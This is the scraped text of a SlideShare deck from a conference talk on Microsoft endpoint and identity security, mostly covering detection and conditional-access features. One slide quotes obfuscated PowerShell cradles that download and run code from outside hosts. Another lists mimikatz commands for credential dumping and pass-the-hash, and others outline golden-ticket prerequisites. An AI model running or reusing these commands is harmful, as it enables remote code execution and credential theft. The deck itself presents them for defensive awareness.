Identity theft jfall17
Your SlideShare is downloading.
×
Check these out next
Recommended
More Related Content
Slideshows for you (20)
Similar to ExpertsLiveEurope The New Era Of Endpoint Security (20)
More from Alexander Benoit (6)
Recently uploaded (20)
ExpertsLiveEurope The New Era Of Endpoint Security
- 1. The new era of endpoint security Alexander Benoit Microsoft MVP Enterprise Security | Certified Ethical Hacker @ITPirate
- 2. Alex Benoit Lead Security Analyst Modern Secure Workplace Microsoft Threat Protection Alexander.Benoit@sepago.de @ITPirate | @TrustInTechCGN | @GeekZeugs https://it-pirate.com/
- 3. Microsoft Threat Protection
- 4. Obfuscation ((${`E`x`e`c`u`T`i`o`N`C`o`N`T`e`x`t}.” `I`N`V`o`k`e`C`o`m`m`A`N`D”).” `N`e`w`S`c`R`i`p`T`B`l`o`c`k”((&(`G`C`M *w=O*)” `N`e`t`. `W`e`B`C`l`i`e`N`T”).” `D`o`w`N`l`o`A`d`S`T`R`i`N`g”(‘ht’+’tps://bit.ly/XYZ’))) $nsadasd = &('n'+'e'+'w-objec'+'t') random;$YYU = .('ne'+'w'+'-object') System.Net.WebClient;$NSB = $nsadasd.next(10000, 282133);$ADCX = ' http://aposdiqwpoe.com/BUR/testv.php?l=ando6.yarn'.Split('@');$SDC = $env:public + '' + $NSB + ('.ex'+'e');foreach($asfc in $ADCX){try{$YYU."Do`Wnl`OadFI`le"($asfc."ToStr`i`Ng"(), $SDC);&('Invo'+'k'+'e- Item')($SDC);break;}catch{}
- 5. protect your data Sandboxing and detonation • anonymous links • companywide sharing • explicit sharing • guest user activity collaboration signals • malware in email + SPO • Windows Defender • Windows Defender ATP • suspicious logins • risky IP addresses • irregular file activity threat feeds • users • IPs • On-demand patterns (e.g. WannaCry) activity watch lists Leverage Signals Apply Smart Heuristics Files in SPO, ODB and Teams 1st and 3rd party reputation Multiple AV engines SharePoint OneDrive Microsoft Teams
- 6. protect your data
- 7. ****** Require MFA Allow access Deny access Force password reset Limit access Controls Users Devices Location Apps Conditions Machine learning Policies Real time Evaluation Engine 3 10TB Effective policy Session Risk conditional access
- 8. conditional access
- 9. conditional access
- 10. conditional access
- 11. conditional access
- 12. conditional access
- 13. conditional access
- 14. conditional access
- 15. conditional access
- 16. pass-the-hash 1. mimikatz 2. privilege::debug 3. sekurlsa::logonpasswords 4. sekurlsa::pth /user:Captain /ntlm:6f0bafeef436381c8d38d106c767f6c8 /domain:itpirate.local
- 17. pass-the-ticket 1. krbtgt user’s NTLM hash (e.g. from a previous NTDS.DIT dump) 2. Domain name 3. Domain’s SID 4. Username that we’d like to impersonate
- 18. pass-the-ticket 1. krbtgt user’s NTLM hash 2. Domain name 3. Domain’s SID 4. Username that we’d like to impersonate
- 19. pass-the-ticket 1. krbtgt user’s NTLM hash 2. Domain name 3. Domain’s SID 4. Username that we’d like to impersonate
- 20. pass-the-ticket
- 21. pass-the-ticket
- 22. pass-the-ticket
- 23. pass-the-ticket
- 24. protect your admin identity
- 25. protection against identity theft Abnormalresourceaccess Account enumeration Net Sessionenumeration DNS enumeration SAM-R Enumeration Abnormalworking hours Brute force using NTLM, Kerberos, or LDAP Sensitiveaccountsexposed in plain text authentication Serviceaccountsexposed in plaintext authentication Honey Tokenaccountsuspicious activities Unusualprotocol implementation MaliciousDataProtectionPrivateInformation (DPAPI) Request AbnormalVPN Abnormalauthenticationrequests Abnormalresourceaccess Pass-the-Ticket Pass-the-Hash Overpass-the-Hash Maliciousservicecreation MS14-068exploit (Forged PAC) MS11-013exploit (Silver PAC) Skeletonkey malware Goldenticket Remoteexecution Maliciousreplicationrequests AbnormalModificationof SensitiveGroups Reconnaissance ! ! ! Compromised Credential Lateral Movement Privilege Escalation Domain Dominance
- 26. protection against cloud threats Malicious Insider Protect against disgruntled employees before they cause damage Ransomware Identify ransomware using sophisticated behavioral analytics technology Rogue Application Identify rouge applications that access your data Compromised Accounts Combat advanced attackers that leverage compromise user credentials Malware Detect malware in cloud storage as soon as it’s uploaded Data exfiltration Detect unusual flow of data outside of your organization
- 27. detection across cloud apps Unusualfile shareactivity Unusualfile download Unusualfile deletionactivity Ransomwareactivity Data exfiltrationto unsanctionedapps Activityby a terminatedemployee Indicators of a compromised session Malicious use of an end-user account Threat delivery and persistence ! ! ! Malicious use of a privileged user Activityfrom suspicious IP addresses Activityfrom anonymousIP addresses Activityfrom an infrequentcountry Impossible travelbetweensessions Logon attempt from a suspicious user agent Malwareimplantedin cloud apps MaliciousOAuthapplication Multiplefailed login attempts to app Suspicious inbox rules (delete,forward) Unusualimpersonatedactivity Unusualadministrativeactivity Unusualmultiple deleteVM activity
- 28. malware detection • Scan cloud storage apps • Identify potentially risky files
- 29. Thank You! Gold Silver Conference Partner
